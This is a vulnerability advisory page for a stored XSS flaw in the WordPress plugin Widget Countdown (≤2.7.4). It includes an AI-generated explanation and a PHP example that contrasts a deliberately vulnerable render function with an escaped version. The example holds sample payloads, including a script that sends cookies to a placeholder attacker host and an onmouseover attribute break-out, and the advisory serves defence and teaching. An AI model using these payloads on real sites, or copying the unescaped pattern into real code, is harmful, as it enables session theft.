CVE-2025-47443
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevart Widget Countdown (widget-countdown) allows Stored XSS. This issue affects Widget Countdown: from n/a through <= 2.7.4.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in Widget Countdown plugin (≤2.7.4) allows attackers with contributor-level access to inject malicious scripts into web pages.
Vulnerability Overview
CVE-2025-47443 describes a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress plugin Widget Countdown, developed by wpdevart, affecting versions 2.7.4 and earlier. The root cause is improper neutralization of user-supplied input during web page generation ([1]): a value that a user can write into the plugin's settings is emitted into HTML without being escaped for the context it lands in. This allows an authenticated user with contributor-level privileges (or higher) to inject arbitrary JavaScript or HTML payloads into plugin output that persists in the database and executes when any visitor loads an affected page ([1]). Contributor is a low-privilege role in WordPress: it can draft but not publish posts and lacks the unfiltered_html capability, so core already strips script from a contributor's post content; a plugin field rendered without escaping bypasses that protection.
Attack Vector
Exploitation requires the attacker to have a WordPress user account with at least the Contributor role. The attacker stores script code in a user-editable plugin field (the advisory does not name the field; a widget title, countdown label or similar setting is the usual kind). The plugin fails to sanitize the value on save and to escape it on output, so the payload is written into the page verbatim. No direct user interaction from the victim is needed; simply browsing a page where the widget appears triggers the payload ([1]).
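The pattern described above, shown as an added illustrative example that is not the Widget Countdown plugin's own code: a minimal widget render routine that interpolates stored settings into HTML verbatim, beside a hardened form that sanitizes on save and escapes on output with the WordPress core escaping API. The field names (title, label), the function names and the payloads are assumed for illustration; the fallback definitions at the top exist only so the file runs under a plain `php` CLI without WordPress loaded.

```php
<?php
// Added example, not the plugin's code. Field names, function names and
// payloads are assumptions made for illustration.

// Stand-alone fallbacks so this runs under plain `php` without WordPress.
// Inside WordPress the core functions exist and these definitions are skipped.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field(string $s): string {
        // Approximation of core: strip tags and control characters, trim.
        return trim(preg_replace('/[\x00-\x1F\x7F]/', '', strip_tags($s)));
    }
}

// Vulnerable pattern: settings saved by a Contributor are echoed into the
// front-end markup as-is on every page render.
function render_countdown_vulnerable(array $instance): string {
    $title = $instance['title'] ?? '';
    $label = $instance['label'] ?? '';
    return '<div class="countdown" data-label="' . $label . '">'
         . '<h3>' . $title . '</h3></div>';
}

// Hardened pattern, step 1: sanitize when the widget's settings are saved
// (the equivalent of WP_Widget::update()).
function save_countdown_settings(array $new_instance): array {
    return [
        'title' => sanitize_text_field($new_instance['title'] ?? ''),
        'label' => sanitize_text_field($new_instance['label'] ?? ''),
    ];
}

// Hardened pattern, step 2: escape on output with the escaper that matches
// the HTML context (attribute value vs. element text). This step alone
// neutralizes payloads that were already stored before the fix.
function render_countdown_hardened(array $instance): string {
    $title = $instance['title'] ?? '';
    $label = $instance['label'] ?? '';
    return '<div class="countdown" data-label="' . esc_attr($label) . '">'
         . '<h3>' . esc_html($title) . '</h3></div>';
}

// Constructed payloads of the kind a Contributor could store in a field.
// attacker.example is a placeholder host, not a real indicator.
$payloads = [
    'title' => '<script>location="https://attacker.example/?c="+document.cookie</script>',
    // Attribute break-out: needs no <script> tag at all.
    'label' => '" onmouseover="alert(1)',
];

echo "Vulnerable output:\n", render_countdown_vulnerable($payloads), "\n\n";
echo "Hardened output:\n",
     render_countdown_hardened(save_countdown_settings($payloads)), "\n";
```

Run with `php example.php`. The vulnerable output contains a live `<script>` element and a `data-label="" onmouseover="alert(1)"` attribute injection; the hardened output contains neither, and would still not even if `save_countdown_settings` were bypassed, because `esc_attr`/`esc_html` run at the point where the value enters the page. That is why output escaping, not input filtering, is the control to check for first when reviewing a fix for this CWE.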
Impact
A successful attack enables the attacker to execute arbitrary JavaScript in the context of the victim's browser session. This can lead to session hijacking, defacement, redirection to malicious sites, or injection of advertisements and phishing overlays. Because the XSS is stored, the payload runs for every visitor of the affected page, including an administrator whose authenticated session is then exposed, and a Contributor account is a low bar for an attacker to obtain ([1]).
Mitigation Status
According to [1], the vulnerability is fixed in version 2.7.5 of the plugin; users are strongly advised to update immediately. For sites where an immediate update is not possible, temporary workarounds include disabling the widget or applying a web application firewall rule to block known XSS patterns; note that a WAF rule only blocks new submissions and does not neutralize a payload already saved in the widget's settings. After updating, review the plugin's stored widget settings for injected markup, since updating the plugin does not remove values already in the database. Patchstack subscribers can enable auto-updates for vulnerable plugins ([1]).
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Widget Countdown (wpdevart, widget-countdown): <= 2.7.4
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.